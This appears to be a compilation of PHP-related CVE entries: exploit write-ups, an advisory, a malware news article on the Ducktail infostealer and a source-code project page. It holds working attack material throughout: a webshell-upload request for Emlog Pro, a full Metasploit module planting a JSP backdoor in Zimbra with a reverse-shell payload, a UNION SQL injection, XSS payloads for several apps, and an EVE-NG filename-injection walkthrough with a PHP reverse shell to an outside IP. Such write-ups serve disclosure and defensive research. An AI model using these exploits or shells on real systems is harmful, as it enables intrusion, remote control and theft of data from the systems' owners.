Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.

    POST /emlog/admin/plugin.php?action=upload_zip HTTP/1.1
    Host: 192.168.111.155
    Content-Length: 876
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.111.155
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary804UeairFtrET9Lt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.111.155/emlog/admin/plugin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lq0s731hnlqm232itjlgpc27el; EM_AUTHCOOKIE_jT79impSwTWeimzUBIsgAmv1NoQbG2Zs=admin%7C1695536025%7C848fc865191736412177851eb6082b92; em_saveLastTime=1664436503884
    Connection: close
    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="pluzip"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���   � Mq=Ua郵/?    �  �   shell/shell.php=?K聾 嗺凔�78h嘍�2渹�v�裫]Dと??$W称��"XjQ皛Q礑??轌3?乿}哏}y��=觾@/@癴撰杻V+5倯x岹儊竲哷孁佸:�蚷?猏Z?,揱戏<氉�賬岈ノ�湞獈煶埑'R齿獙哮甙!?>靾?綱漜晅U?砭7it愴矐堬%{L�z�悏雀╊>��栮詔}岒O懘e隿�鍶趣?爱嘺ㄥ愭�
    AA噣霿扉┹Rq絓茇?cgf?PK���     Bq=U            �   shell/PK��? �   � Mq=Ua郵/?    �  � $               shell/shell.php
           � � F柑)视?F柑)视?�[秤?PK��? �     Bq=U            � $       �   *�  shell/
           � � 棦��视?�8?视?纳�爻迂�PK��    � � ?   N�    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="token"
    
    4e1bef9d513bae43a46448cbbaee0db7d1d5f7d1
    ------WebKitFormBoundary804UeairFtrET9Lt--
    
    

    http://192.168.111.155//emlog/content/plugins/shell/shell.php

CVE-2022-42189: cms_vul/emlog_pro_1.6.0_rce.md at main · wszdhf/cms_vul

This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)',        'Description' => %q{          This module creates a .tar file that can be emailed to a Zimbra server          to exploit CVE-2022-41352. If successful, it plants a JSP-based          backdoor in the public web directory, then executes that backdoor.          The core vulnerability is a path-traversal issue in the cpio command-          line utlity that can extract an arbitrary file to an arbitrary          location on a Linux system (CVE-2015-1197). Most Linux distros have          chosen not to fix it.          This issue is exploitable on Red Hat-based systems (and other hosts          without pax installed) running versions:          * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)          * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)          The patch simply makes "pax" a pre-requisite.        },        'Author' => [          'Alexander Cherepanov', # PoC (in 2015)          'yeak', # Initial report          'Ron Bowes', # Analysis, PoC, and module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-41352'],          ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'],          ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'],          ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'],          ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'],          ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'],          ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Zimbra Collaboration Suite', {} ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/',          'TARGET_FILENAME' => nil,          'DisablePayloadHandler' => false,          'RPORT' => 443,          'SSL' => true        },        'Stance' => Msf::Exploit::Stance::Passive,        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-06-28',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']),        # Separating the path, filename, and extension allows us to randomize the filename        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']),        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']),      ]    )    register_advanced_options(      [        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']),        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),        # Took this from multi/handler        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])      ]    )  end  def exploit    print_status('Encoding the payload as .jsp')    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)    # Small sanity-check    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')    end    # Generate a filename if needed    target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp"    symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10)    # Sanity check - the file shouldn't exist, but we should be able to do requests to the server    if datastore['TRIGGER_PAYLOAD']      print_status('Checking the HTTP connection to the target')      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')      end      # Break when the file successfully appears      unless res.code == 404        fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}")      end    end    # Create the file    begin      contents = StringIO.new      Rex::Tar::Writer.new(contents) do |t|        print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}")        t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755)        print_status("Adding target file to the archive: #{target_filename}")        t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f|          f.write(payload)        end      end      contents.seek(0)      tar = contents.read      contents.close    rescue StandardError => e      fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}")    end    file_create(tar)    print_good('File created! Email the file above to any user on the target Zimbra server')    # Bail if they don't want the payload triggered    return unless datastore['TRIGGER_PAYLOAD']    register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename))    interval = datastore['CheckInterval'].to_i    print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...")    # This loop is mostly from `multi/handler`    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i    timeout = datastore['ListenerTimeout'].to_i    loop do      break if session_created?      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')      end      # Break when the file successfully appears      if res.code == 200        print_good('Successfully triggered the payload')        # This should break when we get to session_created?      end      Rex::ThreadSafe.sleep(interval)    end  endend

Zimbra Collaboration Suite TAR Path Traversal

Best Student Result Management System v1.0 is vulnerable to SQL Injection via /upresult/upresult/notice-details.php?nid=.

\[+\] Payload: nid=2' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)-- - // Leak place ---> nid

    GET /upresult/upresult/notice-details.php?nid=2%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)--%20- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=3thbvl3jh0h823b43vpautdf10
    Connection: close

CVE-2022-42021: bug_report/SQLi-1.md at main · 623085881/bug_report

Simple Exam Reviewer Management System v1.0 is vulnerable to Insecure file upload.

Submitted by oretnom23 on Saturday, February 5, 2022 - 17:22.

****Introduction****

This is a **Simple PHP** entitled **Exam Reviewer Management System**. This is a web-based application is an online platform for reviewing an Exam. It can be useful for schools, companies, organizations, etc. The system provides an answer sheet to the reviewers which have random questions that are possible to occur in the actual exam. The application has a small scope, simple, and is easy to use. It has a pleasant user interface and a mobile responsive at the public side of the system. The project has user-friendly features and functionalities.

****About the Exam Reviewer Management System****

I developed this project using the following:

*   **XAMPP v3.3.0** as my local webserver that has a **PHP Version 8.0.7**
*   **PHP Language**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **Bootstrap**
*   **AdminLTE**
*   and more...

The **Exam Reviewer Management System Project** has 2 sides of the user interface. One is the **Management Side** where the management can manage the Review Questionnaires, and one for the public side. The Public Side of the system is a simple website where the reviewers can read some content about the system, explore the exam reviewer list, and take the Exam to practice. The **Management Side** requires the users to log their system user credentials in order to access the features and functionalities of the said side. The management staffs are the ones who are in charge of managing the practice Test/Exam. This side can be only accessed by 2 types of users which are the **Administrator** and the **Staff**. The **Administrator** has the privilege to access and manage all the features and functionalities on the management side while the **Staff** have only limited access.

****Features********Management Side****

*   **Secure Login and Logout**
*   **Dashboard**
    *   Display the summary of lists.
*   **Exam Categories Management**
    *   Add New Lead Category
    *   List All Lead Categories
    *   View Lead Category
    *   Update Lead Category
    *   Delete Lead Category
*   **Exam Management**
    *   Add New Exam
    *   List All Exams
    *   View Exam
    *   Add Question
    *   List Questions
    *   Update Question
    *   Dynamically add/Remove Choices/Options in every Question
    *   Delete Question
    *   Update Exam
    *   Delete Exam
*   **Manage User List (CRUD)**
*   **Manage Account Details/Credentials**
*   **Manage System Information**

****Public-Side****

*   **Welcome Content**
*   **Exam Lists**
*   **Search Exam**
*   **View Exam Details**
*   **Take the Practice Exam**
*   **View the Practice Exam Result**
*   **'About' Content**

**System Snapshots of some Features****Practice Exam Details (Management Side)**

**Exam List (Public-Side)**

**Exam Details Modal (Public-Side)**

**Questionnaire (Public-Side)**

**Questionnaire - Mobile (Public-Side)**

**Result (Public-Side)**

**Result - Mobile (Public-Side)**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****Installation/Setup****

1.  **Enable** or **Uncomment** the **GD Library** on your php.ini file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****erms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****erms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Exam Reviewer Management System** in a **browser**. i.e. ****http://localhost/erms/****.

**Default Admin Access**

**Username:** admin  
**Password:** admin123

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Exam Reviewer Management System** in **PHP**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   2679 views

CVE-2022-42201: Simple Exam Reviewer Management System in PHP/OOP Free Source Code

An arbitrary file upload vulnerability in the apiImportLabs function in api_labs.php of EVE-NG 2.0.3-112 Community allows attackers to execute arbitrary code via a crafted UNL file.

Hi all! A few months ago, during an activity, I tested an exposed EVE-NG instance. Immediately I thought:

**“I am going to find a critical vulnerability in EVE-NG!”**

I started the analysis and, a few days later, I reached my mission: now I’m gonna explain you all of my process, from recon to RCE, in:

> EVE-NG 2.0.3-112 (community)

_Let’s goo!_

**Phase 1: Inspecting Source Code**

From EVE-NG Website I downloaded the 2.0.3-112 Community version OVF. It was locally available at 192.168.1.26.

I started the source code analysis by finding potentially dangerous functions like exec, passthru, include and so on. After typing exec in search bar I found this:

_Results of ‘exec’ string_

Looking at results page, I realized it could have been so funny because there were a lot of exec references which imply input data to check and validate. I decided to investigate more in depth on _api\_labs.php_: it exposes an API to manage labs functions.

_api\_labs.php_

A quick sight to these functions gave me a hint on which ones I should focus on:

*   Import Lab
*   Export Lab

_Other ones were more sanitized/hard to exploit or they weren’t “highly related” to a potential RCE._

Function

Possible Exploit

Motivation (lines)

apiCloneLab

Path Traversal

_api\_labs.php_: 107, 117

apiDeleteLab

**RCE**

Possible RCE but hard to exploit (input filters)

apiImportLabs

**RCE**

Possible chained RCE

apiExportLabs

**RCE**

Possible chained RCE

**Phase 2: Exploit Theory**

A deeper inspection led me to this plan:

1.  Import zipped LAB with a payload inside filename
2.  Export the same LAB, thus triggering command execution

> Even if in other API calls UNL filename is checked and verified, in Import LAB feature (ZIP file) there isn’t a check on file parameter:

Function _apiImportLabs_ : html\includes\api_labs.php

_apiImportLabs function_

The absence of this check makes possible to inject arbitrary filenames in UNL files: in Linux almost all characters are permitted inside filename, so it’s fantastic. I only had to end filename with _“.unl”_.

In Export LAB feature there is a check to validate the existence of the file. If the file exists, the filename is passed to exec (parameter we control is $relement):

Function _apiExportLabs_ : html\includes\api_labs.php

_apiExportLabs function_

> **NOTE**: Considering that path delimiters in Linux are forward slashes (/) while I was in Windows environment, I had to inject a payload that didn’t contain such characters (/, : in Windows also \\ is path delimiter). I opted to inject as zip argument a bash command.

**Phase 3: PoC**

1) **Login as Admin**

*   To exploit this vulnerability, we must have enough privileges to create a new Lab. **Admin** user is the only role available in this version, so if you have an account on eve-ng, it will surely be an Administrator.

_Login page_

2) **Import a new LAB**

Once in _/#/main_ you must prepare the payload. Craft a payload as shown in steps below:

*   Create a ZIP file with a simple UNL file
*   Open ZIP file and rename it following these rules:
    *   The filename must end with “.unl”
    *   Filename must not contain these characters: / \\ “ ‘ Considering these limitations and that we must inject bash commands, final payload will be like:

> $(eval $(echo BASE64DATA| base64 --decode)).unl

The best thing we can do in this case is build a reverse shell. Payload is base64 encoded, so we need to base64 encode a reverse shell payload. In my case it has been:

> php -r '$sock=fsockopen("192.168.1.22",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

*   Base64-encoded:

> cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMS4yMiIsNTU1NSk7ZXhlYygiL2Jpbi9zaCAtaSA8JjMgPiYzIDI+JjMiKTsn

But you must change it in the following format:

> php -r '$sock=fsockopen("YOUR_LISTENING_IP",YOUR_LISTENING_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

3) **Upload malicious ZIP file as new Lab**

_Malicious ZIP_

4) **Export LAB**

In this final stage you must export the malicious Lab you’ve just created. Shell commands inside the UNL name will be executed. In case of reverse shell, be sure you are listening on IP and port set in malicious filename.

_Netcat listening_

_Export LAB_

_Reverse Shell_

**STAY TUNED!**

CVE-2022-31366: A deep dive into EVE-NG Remote Command Execution

Categories: News
Categories: Threats
Tags: Ducktail

Tags:  infosteal

Tags:  information stealer

Tags:  Zscaler

Tags:  Trojan

Tags:  Facebook Business

Tags:  Facebook API graph

Tags:  Facebook Ads Manager

Tags:  PHP malware

An information stealer known to go after the Facebook accounts of businesses is now after crypto wallets, too.



(Read more...)




The post New PHP-based Ducktail infostealer is now after crypto wallets appeared first on Malwarebytes Labs.

Posted: October 20, 2022 by

A phishing campaign known to specifically target employees with access to their company's Facebook Business and Ads accounts has significantly widened its net and begun using a first-of-its-kind information-stealing malware to go after crypto wallets.

The Ducktail _(Woo-ooh!)_ campaign was first made public three months ago in July, but it's thought to have been active since 2018. The cybercriminal behind the campaign is thought to be from Vietnam.

**Ducktail 101**

Social engineering attacks and malware form the core of Ducktail's _modus operandi_. In previous campaigns, it used a .NET Core malware that specifically steals Facebook Business and Ads accounts and saved browser credentials. All stolen data was then exfiltrated to its command & control (C2) server, a private Telegram channel.

In this latest campaign, the cybercriminals replaced .NET Core with malware written in PHP. Not only does Ducktail continue to steal Facebook credentials and browser data, but it also steals cryptocurrency wallets, too. These are then stored on a command & control (C2) website in JSON (JavaScript Object Notation) format, wherein texts are easy to understand.

Note that Ducktail also broadened its target to include all Facebook users.

The attacker lures their target into downloading and installing a malicious installer (usually compressed in a ZIP file) by making them believe it's a video game, subtitle, adult video, or cracked MS application file (among others). This ZIP is hosted on popular file-sharing platforms.

Once the file is opened, the malware shows a fake "Checking Application Compatibility" pop-up to distract users while it installs in the background. The malware then executes two processes: The first is for establishing persistence on the affected system, meaning the malicious script is scheduled to run daily and regularly; The second is for data stealing tasks. 

Zscaler researchers broke down the kinds of data this PHP malware steals:

*   Browser information (machine ID, browser version, user profiles). In particular, this malicious script is after sensitive data stored in Chrome browsers. 
*   Information stored in browser cookies
*   Crypto account information from the _wallet.dat_ file
*   Data from various Facebook pages, such as API graph, Ads Manager, and Business, which are not limited to: 
    *   Accounts and their status
    *   Ads payment cycle
    *   Currency details
    *   Funding source
    *   Payment method
    *   PayPal payment method (email address tied to PayPal accounts)
    *   Verification status

Data stored on the C2 website is retrieved and used to conduct further information theft within the affected system. Additional stolen information is fed back to the C2 server.

**Stay safe from the Ducktail infostealer**

As Ducktail uses clever social engineering tactics as the precursor to infection and information theft, it is more important than ever for Facebook users, especially those responsible for their business's Facebook accounts, to be wary of this information stealer's risks. Prevention is key.

*   Never download files not relevant to your work, especially if you're using company-provided computers and mobile devices.
*   Be wary of downloading files from popular file-sharing sites. Malware is usually shared there, too.
*   If something seems too good to be true, it probably is. You'd be better off avoiding it.

If you suspect you've been infected by Ducktail malware and you're a Facebook Business administrator, check if any new users have been added to _Business Manager > Settings > People._ Revoke access to any unknown users with admin access.

Lastly, it is essential to have security software you can count on installed on your computer to protect against risky files that may still end up on the computer, regardless of one's vigilance. Remember that some malware campaigns don't need human intervention to infect systems. You have to watch out for those, too.

Stay safe!

**RELATED ARTICLES**

New PHP-based Ducktail infostealer is now after crypto wallets

A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.

**Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS****Exploit Author: Sam Wallace****Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Version: 1.0****Tested on: Debian****ID: CVE-2022-41358****Summary:**

Garage Management System utilizes client side validation to prevent XSS. Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.

**When messages suggest that validation is occuring this is a good point in time to validate that these checks are also being completed server side.**

**This is the request prior to any modifications in Burp.**

**Perform a quick modification in Burp...**

**Profit!**

**Proof**

**POC**

    Parameter: categoriesName
    URI: /garage/php_action/createCategories.php
    

    Host: 10.24.0.69
    Content-Length: 367
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.24.0.69
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.24.0.69/garage/add-category.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
    Connection: close
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesName"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesStatus"
    
    1
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS--
    
    
    ![Alt text](/img/Intercept.png "Optional title")
    

**Reference:**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

CVE-2022-41358: GitHub - thecasual/CVE-2022-41358

phpMyFAQ versions 3.1.7 and prior are vulnerable to stored cross-site scripting (XSS). A patch is available on the `main` branch of the repository and anticipated to be part of version 3.2.0-alpha.

**phpMyFAQ vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Oct 19, 2022 • Updated Oct 19, 2022

GHSA-6rj8-9cm9-6gff: phpMyFAQ vulnerable to Cross-site Scripting

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.

Permalink

**1** contributor

**Users who have contributed to this file**

**Cross Site Scripting vulnerability in the OpenCats 'email' parameter of Check Email functionality**

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET /index.php?m=toolbar&callback=<script>alert`xss`</script>&a=checkEmailIsInSystem&email=<script>alert(document.domain)</script>

CVE-2022-43018: opencats_zero-days/XSS_in_checkEmail.md at main · hansmach1ne/opencats_zero-days

OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.

Permalink

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

**1** contributor

**Users who have contributed to this file**

Cross Site Scripting vulnerability in the OpenCats 'indexFile'.

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

**PoC**

    GET //ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert`xss`</script>&isPopup=0

Tag

#php